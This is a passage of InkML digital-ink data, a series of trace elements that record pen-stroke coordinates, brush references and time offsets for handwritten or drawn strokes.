16,53-40-1,-1 13-15,-12 0 0,-14 0 16,40 1 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36873.75">6892 8797 0,'67'80'78,"91"131"-62,-118-158-16,0-13 15,79 119 1,-80-120-16,41 94 16,39-1-1,-119-92-15,26-27 0,14 40 16,39 39-1,-26-52 1,-53-27-16,0 1 16,14-1-1,-1 13 63,0-26-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38300.11">8427 8731 0,'79'53'16,"-65"-40"-16,25 54 15,41 25 1,-54-79-16,67 106 16,-67-105-1,-13 12-15,14 1 0,13-1 0,39 27 16,-53-27-16,80 54 15,79 65 1,-158-118 0,65 39-1,-65-40-15,39 27 16,27 13 0,-80-66-16,0 14 15,0 12-15,27 14 16,0-14-1,-27-26-15,13 40 16,27 0 0,-53-27-16,14 0 15,-1 0-15,40 53 16,-14-26 0,28 13-1,-54-26-15,53-1 16,13 27-1,-52-53 1,-14 13-16,0-13 156,0 0-140,1 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44593.94">10716 8943 0,'13'26'78,"13"14"-63,-12-27 1,-1 1-16,40 12 31,-53-13-15,26 14 0,-13-14-1,1 0 1,-1 0-1,-13 1 1,0-1 0,13 0 31,40 27-32,-40-40 1,0 39-16,40 1 15,-39-27 1,-1 14-16,0-14 16,-13 0-1,26 0 1,-26 1 0,14-14-16,-1 13 15,0 0 1,14 0-1,-1-13 1,-13 14 0,1-1-1,-1-13-15,0 0 16,0 13-16,14 0 31,-14 1-15,0-14-1,0 0-15,14 26 32,13-26-1,-27 26 0,0-26-15,13 14-1,27 25 1,-53-25-16,14-1 0,-1 13 16,27 14-1,-27-14 1,0-26 0,0 0 109,0 14-94,-26-14 16,-26 0-32,39-27-15,-14 1 0,1-1 16,0 14-16,0-13 0,-14-1 0,1-39 16,-1 40-1,14-1 16,-13-13-15,12 27 0,1 13-16,0-40 15,-40-26 1,13 13 0,1 14-1,25 39-15,-12-27 16,-1 14-1,1-13 1,13 12-16,13 1 0,106 172 234,-27-53-218,-66-67-16,0-12 0,14-1 16,26 40-1,-40-66-15,-13 14 16,0-1 0,0-26 171,-66-93-171,39 79-16,-26-52 15,1 13 1,38 53-16,1-14 16,-40-26-1,40 40 1,-14-13-1,14-1 17,0 14-32,13 0 31,26 52 110,107 133-126,-67-39 1,-13-54-1,-13-13 1,-14-39 15,-26-14-31,26 13 32,-39-26 77,-132-119-93,105 93-1,-13-14-15,-66-66 16,93 93-16,-1 0 15,-39-67 1,40 67-16,-1 0 0,-52-66 31,65 79-31,14-14 0,0 1 0,0 0 16,-13 13-16,0-27 16,0 27-16,13-13 0,26 13 171,93 53-155,14 53 15,-14 0-15,-106-80-16,40 40 16,79 53-1,-132-105-15,79 78 16,1-12-1,-27-14 1,-53-53-16,13 13 0,0-12 16,53 52-1,-13 0 1,-26-40 0,-1 1-1,-26-14 1,13 0-16,1 1 15,-1 12 1,13 14 31,-12-27-31,12-13 15,14 13-16,-14-13 1,27 13 0,53 14-1,-40-1 1,-53-26-16,14 0 16,-14 14-16,0-14 0,14 13 15,-14-13 1,0 0-16,-13 13 0,40-13 31,-14 27-15,40-1 15,-39-26 63,-27 13-16,53 40-63,-27-40-15,-13-13 0,80 40 32,-40-14-1,-40-26 125,-66-39 94,-66-67-234,80 80-1,12 12-15,-39-39 0,-53-52 32,106 91-32,-14 1 15,27-13 1,-26-1 0,13 27-16,-27-40 15,-26 14 1,-14-40-1,27 39 1,40 27-16,0-13 0,-14 0 16,14 0-1,-26-1 17,-28-25-17,41 26 1,-27-1-16,0-25 15,27 25 1,26 1 0,-40 0 77,14 0-77,26 0-16,-14-1 16,1 1-1,0 13 63,39 0 32,54 106-95,-1-66 1,-26-1 0,-13-26-1,-1 14 1,-39-14-16,14 0 0,12 1 16,0 12-1,1-26 1,-14 27-16,0 12 15,14 1 1,-1-14 15,-26-12-31,27 12 16,-27-13 0,39 14-1,-25-1 1,12 14-1,1-14 1,-14-12 0,0-1-1,14 13 32,-14-12-31,0-1-1,0 0-15,-13 0 16,27 0 15,-14 1-15,-40-14 421,14 0-405</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="48987.09">12832 8811 0,'0'39'156,"14"-39"-140,-1 14 0,0-1-1,0-13-15,0 13 16,14 13-1,-1 1 1,1-1 0,-14-12-16,13 12 15,-12 1 17,-1 12-17,0-12 1,14 26-1,-27-40-15,0 0 16,0 14-16,0 12 31,0-26 1,0 40 61,26-13-77,-26-27-16,0 0 16,27 14-1,-14-14 1,0 27-1,0-27 1,14 27 15,-14-40-31,-13 13 0,26 0 16,-12 27 0,-1-40-1,0 26 1,-13-12-1,27 12 1,-14 1 0,13-1-1,-13 14 1,14-14 0,-27-13 62,26 40-63,-26-40 1,14 1 0,-14-1-16,13 0 15,-13 14 16,0-14-15,13-13-16,-13 13 16,13-13-1,1 13 1,-14 14 0,26-14-1,-13 0 1,0 0-1,1 1-15,-14-1 32,0 0-17,13 0 1,0 1 0,14 12-1,-14-13 266,-13-52-202,0-80-64,-13 92-15,-1-13 0,-52-92 16,53 66-1,-13 13 1,12 27 15,14-14-15,-26-13 0,13 0-1,13 27 1,-14 26-16,1-40 15,13 0 1,-13 1 0,13 25-16,-13 14 0,13-26 15,0 13-15,0-1 16,-27-12 0,27 13-16,-13 0 15,0-40 16,13 39-31,0 94 282,0 78-267,0-118-15,0-13 16,39 78 0,-39-78-16,14-1 0,-1 1 15,13 26 1,-26-14-1,14 14 1,-1-26-16,0 12 16,0-12-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="56023.38">12740 8996 0,'26'0'16,"-13"0"15,1 0-15,-1 0 0,13 0 15,1 13-16,-14 27 1,13 13 0,14-27-1,-27 14 1,1-27-16,-14 27 16,39-14-1,-39-13-15,0 40 16,40 0 15,-40-40-31,13 27 0,-13-27 16,13 14-1,1-14-15,-1 14 16,0-1 0,14 0-1,-14-12-15,0 12 31,13 1-15,-12 12 0,12-12-1,-26-14-15,27 0 16,-27 0-16,13 1 16,0 12-1,0 1 32,1 12-16,-1-12-15,-13-14 0,0 0-16,13 0 15,-13 14 1,0-14-16,13-13 0,-13 13 15,0 1 48,-13-67 62,-53-106-109,53 132-16,-14-12 0,14-1 15,-27-79 1,1 66-1,39 27 1,0-14 62,0-26-62,0 53-1,0 118 142,13 107-142,40-66 1,-14-41 0,-39-91-16,14-1 15,-1 13-15,-13 14 16,13 26-1,-13-39 1,13-14 15,-13-26 63,-66-173-78,40 133-16,-1-13 0,-26-53 15,-26-92 1,52 184-16,14 1 16,0-1-16,0-12 0,13 25 0,0-12 0,-27-27 15,27 13 1,-26-13-1,26 40 1,0-27-16,0 27 16,0-13-16,0-1 15,0 1-15,0 13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="129988.73">22185 13282 0,'0'27'78,"-66"-27"-63,53 0-15,0 0 16,-1 0-16,1 0 16,0 0-16,-66 13 31,12 0-15,1-13-1,13 13 1,40-13-16,-13 0 0,13 13 15,-40 1 1,-14-14 0,15 0-1,-28 0 1,40 0 0,27 0-16,-26 0 15,-14 13 1,39 0-16,1-13 15,0 0-15,0 0 0,-40 13 16,26-13 0,14 0 15,0 14-31,0-14 16,13 13-1,-14-13 1,1 0-1,0 13-15,-13 0 32,12-13-17,1 14-15,-13-1 32,12 0-17,1-13-15,0 26 16,13-12-1,0 12 1,-13-13 0,-1 14-16,14 26 15,0 0 17,0-27-17,0-13 1,0 1 46,0 25-46,0-26 0,0 14-1,14-27 1,-14 13-1,13 0 1,0 1 15,0-14-15,1 0-16,-1 13 16,0 0-1,0-13 1,14 0-1,12 0 1,1 0 0,-27 0-16,14 13 15,39 1 1,-53-14-16,40 0 16,0 0-1,-27 0 1,1 0-1,-1 0 1,27 0 0,-26 0-1,12 0 17,1 0-17,13 0 1,-40 0-16,1 0 15,-1 0-15,0 0 16,27-14 62,-1 14-62,-25 0-16,-1 0 15,26-13-15,1 13 16,-27 0 0,1 0-1,12 0 48,1-13-48,-1 0 1,0 13 0,-26-14 15,40-25-15,-27 12-16,1 27 15,12-26-15,1-1 16,-1 1-1,-13 13 1,-13-1 0,0 1-16,13 0 15,1-14 1,-14-12 0,13-1-1,0 0 1,-13 14-16,0 0 15,0-41 1,0 28 0,0-1-1,0 14 1,0 12 0,-13-12 109,13-1-110,-13 14-15,-1 13 0,1 0 0,0 0 16,-40-26-1,40 26-15,0 0 0,-14 0 16,-13 0 0,27 0-16,-26 0 15,-1 0 1,13 0 0,1-27 62,-1 27-63,1 0 63,13 0 16,-67 0-78,54 0-1,-27 0-15,-106 66 16,120-39-16,-107 13 16,-92 26 15,198-66-31,-13 26 16,40-26-1,13 13 1,0 14 218,0-1-218,0-12-1,13 12 1,-13-13 0,14 14-1,-14-14 1,13 0 0,-13 14 249,40 12-249,-27-12-1,-13-14 1,53 40 125,-40-53-126,0 0-15,14 13 0,-27 0 16,26 1 0,-13-14-1,14 13 63,39 40-62,-53-53-16,0 0 16,14 13-1,-14 0 1,0 0 78,14 14-79,-14-27-15,0 0 16,0 0-16,14 26 15,-14-26 64,27 14-64,-27-1-15,13-13 16,14 13-1,-27-13-15,27 13 16,-27-13 0,14 13-1,12-13 48,-12 0-48,26 0 1,-40 0 0,0 0-16,53 0 31,-39 0-15,-14 0-16,14 0 15,-1 0 1,-13 0-16,0 0 15,27 0 1,-13-13 0,12-26-1,-25 25-15,12 1 16,-13 13 0,-13-13 15,27-40-16,-27 40 1,0-14-16,0 1 0,0-27 16,0 40-1,0-14 1,13 1-16,0 12 16,-13-25-1,0 26-15,0-27 16,0-13-1,0 40-15,0-27 16,0 0 0,0 27-1,-13 0 1,13 0-16,0-1 0,0 1 16,-13-26-1,13-1 1,-14 13-1,1 14 1,13 0 93,-66-27-62,13 14-31,-26-1 0,13 27-1,52 0-15,-39 0 16,40 0-1,0 0 32,-66 0-15,65 0-32,-38 0 15,-15 0 1,54 0-16,0 0 0,-14 0 15,1 0 1,0 0 15,12 0-15,1 14-16,-13-1 0,-14 0 16,13 27-1,-12-27 1,26 0-1,13 0 1,-14 1 31,1-14-31,13 13-16,-13-13 0,0 13 15,-14 14 1,27-1-1,0-13-15,-26 14 16,26-14 0,0 13-1,0-12 63,0 12-62,0 1 0,0 12 31,0 1-32,0-14 1,0-12-1,0 12 48,0 40-47,0-26-1,0-27 1,0 0 31,13 14 125,0-14-157,-13 13 79,13 14-63,14-40 47,26 27-62,-27-27-16,1 0 16,39 13-1,0 0 1,-40-13-16,-12 0 15,12 13-15,27-13 16,-26 0-16,-14 0 16,0 0-16,13 14 31,-12-14-31,12 0 31,27 13-15,-27-13-16,1 0 15,-1 0-15,14 0 16,-13 0 0,-14 0-16,13 0 78,14 0-63,-27 0 1,0 0-16,14 0 63,13 0-48,-27-13-15,0 13 0,0-14 16,14-12-1,-14 13 1,0-1-16,27-39 31,-27 14-15,-13 26-16,13-1 0,1-12 16,-14-1-16,13 1 0,13-27 15,-13 40-15,-13-40 16,14 0-1,-1 53 1,-13-13-16,0-27 16,0-13-1,13 13 17,0 14-17,-13 13 173,-13-14-173,13 1-15,-106-1 32,93 14-32,-13 13 15,-27-13 1,39 0-16,1 13 15,-26-14 17,12 1-17,-13 13 1,-26 0 0,53 0 15,0 0 47,-53 0-62,52 0-1,1 0-15,-27 0 16,27 0-16,-26 0 15,-1 0 1,13 0 15,14 0-15,0 0-16,0 0 16,0 0-1,-1 0 1,1 0-16,-13 13 15,-1-13 1,-13 0 15,-12 0 1,25 14-17,14-1 1,-14-13-1,1 0 1,13 0 0,-14 26-1,14-12 1,-27-14 0,27 26-1,-27 1 1,40-14-1,-26 26 110,26-25-109,0 39 47,0-40-48,0 0 48,0 27-48,0-14 1,0 1 0,0-14-1,0 13 79,0 14-78,0-27 15,13 0-16,-13 1 1,13 25 0,-13-25-1,14-1 32,-1 0 78,13 14-109,-26-14-16,14-13 15,-1 0-15,0 13 0,13 13 16,1-26 15,-14 14 16,27 39 0,0-27-31,-27-26-16,0 0 15,0 13-15,0-13 32,1 14 14,-1-1 17,0-13-47,0 0-16,1 0 15,-1 0 1,0 0-16,14 0 15,12 0 1,-26 0-16,1 0 0,39 0 16,-14 0-1,-26 0-15,1 0 0,-1 0 16,13 0 0,1 0 77,13 0-77,-27 0 15,0 0-15,0 0-16,0 0 15,14 0 1,-14 0-16,0 0 16,40 0-1,-39 0-15,-1 0 0,0 0 16,0 0-16,0 0 0,1 0 16,-1-13-16,13-14 15,14 14 1,-13-27-1,12 14 1,-26 12-16,27-38 16,53-28 15,-67 67-15,-13 0-1,1-1 1,-1 14-1,-13-13 48,0-40-47,0 40 15,0-27-16,0 14 1,0 0 0,0 12-1,-13 1-15,-1 0 32,1-14 46,-13-12-63,-1-1 1,-12-13 0,25 40-16,1 0 15,13-1-15,-13 1 94,-119-53-63,105 66-31,1-13 16,-14 0-16,27-1 0,-40 14 15,13-13 1,0 13 47,-52 0-48,65 0 1,1 0-16,-27 0 15,0 0 126,40 0-125,-27 0 124,-66 0-124,80 0-16,-40 13 31,53-13-31,-54 27 16,14-14-1,14 13 1,12-26 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="152854.18">11324 7673 0,'-40'26'0,"80"-52"0,-185 105 16,118-79-16,14 0 0,-40 27 15,0-1 1,53-13-16,-13 1 0,-27 12 16,14-26-16,-40 40 15,39-27-15,1 0 0,12-13 16,-12 13-16,-14 14 15,-39 13 1,52-27 0,-12 13-16,39-12 15,-40 25-15,-26 1 32,39-27-17,14 0-15,-13 14 16,-1-1-1,-12 27 1,-14 53 0,26-79-16,1 12 15,-40 160 1,52-120-16,14-39 0,0 26 16,40 93-1,-27-120-15,67 80 16,52 0 15,-106-119-31,14 40 0,-27-27 16,1 1-16,39-1 0,66 26 15,-80-39 1,54 14 0,-67-14-16,14 0 0,0 0 0,-14 0 15,133-27 1,-119 14-16,13-13 15,105-14 1,-118 27-16,0-14 0,79-39 16,53-40-1,-119 80-15,39-27 16,-52 26-16,-14 1 0,41-27 16,-1 13-1,-40 14 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="154171.07">13348 10345 0,'-13'-13'15,"-106"13"1,66 0-16,-79 13 16,-53 40-1,145-40-15,-26 14 16,39-14-16,1 13 16,13-26-16,-14 40 15,14-40-15,13 13 16,-40 1-16,0 78 15,40 27 17,0 146-17,14-252 1,-1 0-16,0 14 16,-13-14-16,13 13 15,14 41 1,13-14-1,-1-1 1,-26-52-16,27 27 16,-27-27-16,1 0 0,-1 0 15,13 0-15,-12 0 0,38 0 16,15 0 0,38-40-1,-12 1 1,-80 25-16,53-39 15,-52 27-15,12 13 16,1-27 0,-1-158 15,-26 184-31,0-25 0,0-14 31,-40 0 32,-52 0-48,65 26-15,-39-25 16,26 25-16,-26-13 16,53 40-16,-66-26 15,52 26 63,14 0-62,0 0-16,0 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="157420.65">17568 7514 0,'0'0'0,"-26"-26"31,-358 39 0,318 0-31,-40 14 16,67-27-16,-14 13 0,-27-13 16,-78 13-1,118 0-15,13-13 16,-39 27-16,-53 12 15,79-25 1,-12-1-16,12-13 16,27 13-16,-27 0 0,13-13 15,-144 40 17,157-40-32,-12 0 0,-1 0 0,14 13 15,-53-13-15,26 0 16,-79 0-1,27 0 1,65 0-16,-39 0 16,53 0-16,-14 0 0,1 0 15,-40 0 1,-27 0 0,80 0-16,-53 0 15,53 0-15,-1 0 16,-39 27-16,40-27 0,0 13 15,-14-13-15,1 0 16,13 0-16,0 0 0,-27 0 16,27 0-1,-1 0-15,-25 0 16,12 0 15,14 0 32,-53 40-48,53-40-15,-27 39 16,27-39-16,0 0 0,-1 14 16,-12-1-1,-1 13 1,27-13-16,-13-13 15,13 14-15,0-1 0,0 0 16,0 67 0,0-67-1,0 26 1,0-12-16,0-14 0,0 0 0,0 1 0,0 52 31,0-40-31,0-13 0,0 14 0,0-1 0,0-12 16,0 12-16,0-13 0,0 53 15,0-52-15,0 65 16,0 0 0,0-26-1,0 0 1,0-40-16,0 1 0,0-1 16,0 13-1,13-12 1,1 12-1,25-13 1,-12-13-16,-27 14 16,53-1-16,-40 0 15,13 0-15,14 0 16,225 54 0,-173-67-16,-79 13 0,27-13 0,-13 0 15,-1 0-15,53 0 16,-52 0-16,-1 0 0,1 0 0,12 0 15,-12 0-15,66-13 16,251-106 0,-265 105-16,66-39 15,-52 27-15,145-27 16,-172 40-16,27 0 0,0 13 16,65-27-16,-78 14 0,52 0 15,-39-14-15,-1 14 0,67 0 16,-80 13-16,-39 0 15,26 0-15,-13 0 0,-13 0 0,-14 0 16,1 0-16,105 0 16,-119 0-1,40 0 17,-40 0-17,14 0-15,12 0 0,-25 0 0,12 0 0,1 0 16,65 0-1,-65 0-15,145 0 16,-106-14 0,-40 14-1,1 0 1,-14 0-16,13-13 16,27 13-1,-40-13-15,14 13 16,-14-13-16,14 13 15,12-27 1,-25 27 0,12 0-16,-13 0 15,40-26-15,0-1 16,-40 14 15,1 13-15,-1-39 15,-13-1-15,0 27-16,0-14 0,0 14 0,-13 0 15,-14-40 1,14 40-16,-14-27 16,14 27-16,13-1 0,-13 14 15,0-13-15,-67-53 16,67 40-1,-13 26-15,-14-27 0,-53-39 16,14-13 0,53 65-1,-14-25-15,27 39 16,-27-40 0,27 40-16,-14-13 31,1 0-16,13-1 1,-54-12 0,41 13-16,13-1 0,-40-12 15,-66-27 1,92 40-16,-12 0 16,25 13-16,-12 0 0,-40-14 15,39 1 1,14 13 46,-53 0-46,53 0-16,-14 0 0,1 0 16,13 0-16,-1 0 15,-12 0-15,13 0 0,-27 0 16,-53 0-1,80 13-15,-13-13 0,26 14 16,-80-1 0,41-13-1,-28 13 1,15-13 0,-28 0-1,67 0-15,0 0 16,-1 0-16,1 0 0,0 0 0,-13 0 15,-27 0 1,39 0 0,-12 0-1,13 0 1,-1 0-16,-12 0 31,0-13-15,-27 0-1,26-1 1,-12 14 0,12-13-1,14 13 79,-40 0-78,40 0-16,-1 0 15,-38 0 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="163273.6">15677 10729 0,'0'-13'46,"0"-1"33,0 1-64,-106 0 1,0 13-1,53 0 1,27 0 0,12 0-1,1 0-15,0 0 32,0 0-17,-1 0 63,-39 0-62,40 0 0,0 26-1,0-26 16,0 27-15,13-14 0,-14-13-16,14 13 0,0 1 0,0 38 15,0-38 1,0 12 0,0-13-16,0 1 0,0 12 15,0 14 1,0-27-16,0 0 0,0 0 15,0 54 1,0-41 0,0 80-1,0-93-15,0 0 16,0 1-16,0 12 78,14 0-47,-1-12-15,0-1 15,0-13 0,14 13 1,-1-13-17,-13 0-15,14 0 16,-1 13 0,-12-13-1,-1 0 32,13 14-31,-13-14-1,14 0 17,-14 0-17,0 0 1,1 0-1,-1 0-15,13 0 16,-13 0 31,27 0-31,-27 0-16,14 0 15,13 0 1,-14 0 78,0 0-79,-12 0 1,-14-14-1,13 14-15,13 0 32,-12 0-17,-1-105 63,-13 38-62,0 41 0,13-1-16,-13 1 15,0-14 1,0-52 15,0 65-15,0 1-1,0 13-15,0-1 16,0-25 0,0 25-16,0 1 15,0-13 1,-13 26 46,0-13-30,13-27-17,0 27 126,-40-1-125,27 1-16,-1 13 0,-25 0 15,12-13 1,14 13-1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6-09T20:06:54.2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10173 4617 0,'-26'-13'172,"-1"13"-156,14 0-16,0 0 16,-14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1888.2">11364 4683 0,'-53'0'78,"-66"27"-62,79-14-16,14-13 15,-1 13-15,-52 13 16,66-12-16,-1-14 0,1 0 15,0 0 1,0 0 0,-27 13-1,40 0-15,-13-13 0,-14 13 16,14 1-16,-27 12 16,27-13-16,0-13 0,0 14 15,0-1-15,-1 13 16,-25 1-1,39-14 1,-14 13-16,1 1 16,0-27-1,13 26-15,-13 14 16,13-27 15,0 0-31,0 14 16,0 13-1,0-14 1,0 1 0,0-14-1,0 0 1,0 0-16,0 0 16,0 14-1,0 13 1,0-27-1,26 0 1,-13-13 0,1 0-1,-1 0-15,40 13 16,-53 0 0,26-13-1,-13 0-15,14 0 16,-1 0-1,-12 0-15,-1 0 0,13 0 0,27 14 32,0-1-17,-40-13-15,40 0 16,-40 0-16,27 0 16,-13 0-1,-1 0 1,-13 0-1,14 0 1,-1 0 0,14-13-1,26-53 1,-53 52 0,14 1-1,-1-13 1,-13-14-1,14 14 1,-27 12-16,13-25 16,0-28-1,-13 54-15,0-13 16,0 13-16,0-1 0,0 1 16,0 0-16,0-14 15,0-12 1,0 12-1,0 14 1,0 0 0,0 0-16,0-27 0,0 27 15,0-1 376,0-12-375,0 13-16,-13 13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4828.58">10266 5120 0,'13'-14'454,"-13"1"-439</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5011.18">10279 5093 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5200.31">10279 5093 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6127.83">10266 5265 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6977.53">10266 5133 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7169.64">10266 5133 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7339.41">10266 5133 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8659.41">10266 5133 0,'0'-13'156,"-13"39"-140,-1-13 0,-12 1-1,26 12 1,-13 1-1,-1-14-15,14 0 32,-13-13 249,-40 26-265,0 41-1,27-15 16,13-38-31,-1 25 32,14-25-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11483.81">11774 5173 0,'13'0'62,"-13"53"1,0 26-48,0-53 1,0 14 15,0-27-31,0 0 0,0 1 16,0-1-16,0 0 0,0 14 15,0-1 1,0 14 15,-13-27-15,13 0-16,-13-13 0,13 13 16,0 1-1,-27-1 32,1 13-31,13-12-1,-1-1-15,1 0 0,13 0 0,-13 1 0,0-1 16,-1 0-16,-12 13 16,13-26 15,13 14 47,-13 12-62,-1-26-1,14 13 1,0 1 62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14147.77">12740 5358 0,'0'-13'63,"-40"13"-47,0 13-1,14 13 1,26-13-16,-13-13 15,13 14 1,-14-1 0,-12 27-1,13-27 1,13 0 15,-27-13 125,-12 40-140,25-27 0,1-13-16,0 13 0,13 0 0,-27 14 15,14-27 95,-27 13-95,-12 27 1,-1-14 0,53-12-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15538.62">12263 5556 0,'-39'0'62,"-120"66"-46,133-39-1,-1-14-15,-13 0 0,14 14 0,-1-14 0,-12 13 16,26-26 0,-1 14-1,14-1 1,-13 0-16,0-13 31,39 0 94,67 0-109,-67 0-16,1 0 0,-1 0 15,-12 0 1,-1 0 109,40 0-109,-27 0-1,-13 27 1,1-27 171,12 0-171,-26-14-16,13 1 16,-13 0-16,0 0 0,0-40 31,0 13-15,0 27-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16305.34">12819 5226 0,'0'-14'15,"-13"14"48,-14 53-48,-12 0 1,25 0 0,1 0-1,0-27 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19764.07">13282 5569 0,'13'0'125,"159"-26"-109,-145 13-16,52 0 15,-52-1-15,12 1 16,-26 13-16,1-13 47,52-27-16,-13 14-15,13-1-1,-53 27-15,14-13 0,-1 13 0,53-13 32,1-27-17,-67 40-15,27 0 16,-14 0 0,1 0 15,-14 0 0,0 0-15,0 0 46,1 0-46,-1 13-1,0-13 79,13 0-78,-12 0-16,-1 0 15,0 0-15,14 0 16,12 0 0,-12 0-1,39 0 1,-53 0 0,40-13-1,-40 13-15,14-13 16,-14 0-1,0 13 1,0-53 140,-13-13-140,0 39-16,0 1 31,0 12-31,0-12 16,0-14-1,0 27-15,0-13 16,-26-1 0,13-13-1,13 14 1,0 13-16,0 0 0,-13-1 16,13-12-1,0 13-15,0-14 16,0 1-1,0 12 1,0 1-16,0 0 16,0-13-1,0-1 17,-14 14 14,1 0-30,-13 13-16,12-14 0,-52 14 16,-198 0-1,171 0-15,0 0 16,80 0-16,-13 0 0,-1 0 16,-26 0-1,40 14-15,-13-14 16,-40 0-1,13 0 1,26 0 0,27 13-1,-13-13 235,-40 0-234,27 0 0,-67 0 15,80 0-31,0 0 0,-1 0 15,-25 0 1,25 0-16,1 0 16,-27 0-1,27 0-15,-26 0 16,25 0 0,1 0-16,0 0 15,0 0-15,-1 0 78,1 0-62,0 0 0,0 13-1,13 0-15,-14-13 16,1 27-1,0-14-15,0 27 16,0-14-16,-14 27 16,27-40-16,-13 67 15,13-54-15,0 1 0,0 26 16,0-27-16,0-13 0,0 40 16,0-40-16,0 1 15,0 25 1,0 1-1,0-27-15,0 40 16,0-26-16,0-14 16,0 26-16,0 14 15,0-26 1,0-14 15,13 14 94,66 12-109,-52-39-1,-14 0-15,14 0 0,-1 0 0,-13 0 16,67 0-16,-27 0 16,-40 0-1,13 0 1,14-13 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30757.08">11364 6720 0,'-27'0'47,"-52"0"-31,66 0-16,-67 0 15,-12 0 1,65 0 0,1 0-16,-14 0 0,-185-13 15,172 13-15,40 0 16,-13-13-16,-14 13 31,0-13-15,-26-1-1,26 14-15,-12 0 0,-28 0 16,41 0-16,25 0 0,-52 0 16,-26 0-1,65 0-15,1 0 16,-14 0 0,27 0-1,-1 0 1,1 0-16,0 0 15,0 0-15,-40 0 16,13 0 0,14 0-1,12 0 1,1 0 15,-13 14 32,13-14-48,-1 13-15,1-13 0,0 26 16,0-12-16,-1-1 0,-12 0 16,26 0-16,-13 14 0,0-14 15,13 13-15,-53 80 16,39-79-16,1 12 15,13-12-15,-26 26 16,26 0 0,0 13-1,0-53 1,0 14-16,0-1 0,0 53 31,0-52-31,0-14 0,0 27 16,0 39-1,0-52-15,0 26 16,0-14 0,0-26-16,0 1 0,0 12 15,0 27 1,0-13 0,0-27-16,0 0 15,0 27 1,0-27-16,26 0 125,14-13-110,-27 0-15,14 0 0,12 0 16,54 0 0,-80 0-16,93 14 15,-14-14 1,1 0 0,-53 0-1,-27 0-15,0 0 16,27 0-16,66 26 15,-80-26 1,-13 0-16,27 0 0,-13 13 16,52 14-16,0-1 15,-65-26 1,-1 0 15,13 27 0,40-27-15,-52 13-16,65-13 16,27 0-1,-93 0-15,53 0 16,27 0 0,-40 0-1,0-13 1,-40 13-16,13-14 15,-12 14-15,12-13 0,67-40 16,-14 14 0,-26-1-1,-40 27 1,0 13-16,1-40 0,39 0 31,-40 40-31,13-26 16,27-14-1,-40 40 1,1-13 0,-14-14 15,13 1-15,13 0-1,-26-14 1,0 13-1,-13 14 1,13 0 0,-13 0-16,-14-27 15,14-53 1,0 67 0,0-14-16,-14-66 31,27 93-31,0 0 0,0 0 15,0-53 1,-13 26 0,0 0-1,13 27-15,0 0 0,-13 0 47,-1-67-31,1 27-1,13 14 1,0 25-16,-13 1 16,0-13 140,-1 12-140,1 14-16,-13 0 15,-1 0-15,-12 0 16,12 0-16,14 0 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32084.16">12105 7964 0,'39'0'125,"80"-27"-110,-26 14-15,-14 13 16,54-13-1,-94 13-15,-12-13 0,-14 13 0,27-13 16,-14 13 0,-13 0-16,1 0 15,-1 0 1,13 0 0,1 0-1,13 0 1,-27 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33260.91">13560 7699 0,'40'0'62,"39"0"-46,53 0 0,1 14-1,-94-14 1,1 0-16,-27 0 0,14 0 0,-1 0 16,40 0-1,-53 0 1,27 0-1,-13 0 1,12 0 0,-26 0-16,14 0 0,-1 0 15,14 0 1,-13 0 0,-14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34125.94">15094 7779 0,'14'-13'32,"-1"13"-17,0 0-15,40 0 16,13 0-1,-53 0 1,14 0-16,66 0 16,-80 0-1,13 26-15,-13-26 47,1 0-16,39 13-15,-27-13-16,27 0 16,66-13-1,-40 0 1,-65 13-16,39 0 31,-14 0-15,-26 0-16,-13-13 94,0-1 15</inkml:trace>
